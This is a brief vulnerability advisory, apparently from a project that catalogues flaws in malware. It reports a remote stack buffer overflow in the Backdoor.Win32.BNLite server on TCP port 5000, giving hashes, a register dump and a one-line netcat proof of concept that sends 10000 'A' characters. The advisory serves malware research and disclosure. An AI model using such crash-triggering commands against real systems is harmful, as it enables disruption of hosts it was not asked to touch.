Backdoor.Win32.BNLite Buffer Overflow

Backdoor.Win32.BNLite malware suffers from a buffer overflow vulnerability.

MD5 | dbde5bac13398ffd2ee1d5e6cfbbb825

Discovery / credits: Malvuln - (c) 2022
Original source:
Contact: [email protected]

Threat: Backdoor.Win32.BNLite
Vulnerability: Remote Stack Buffer Overflow
Description: BioNet Lite Server 4.0a listens on TCP port 5000. Third-party attackers who can reach an infected system can trigger a buffer overflow overwriting the ECX, EDX and AX (16-bit) registers by sending a long junk payload.
Family: BNLite
Type: PE32
MD5: 0d1f873f6816debd244e1e77509f6ba7
Vuln ID: MVID-2022-0502
Dropped files: procmon.exe
ASLR: False
DEP: False
CFG: False
Safe SEH: False
Disclosure: 03/03/2022

Memory Dump:
EAX : 00004141
EBX : 027BD120
ECX : 41414141
EDX : 41414141
EBP : 0019FC08
ESP : 0019FA48
ESI : 027BD128
EDI : 02780000
EIP : 776E2D6A ntdll.776E2D6A

C:\>python -c "print('A'*10000)" | nc64.exe x.x.x.x 5000

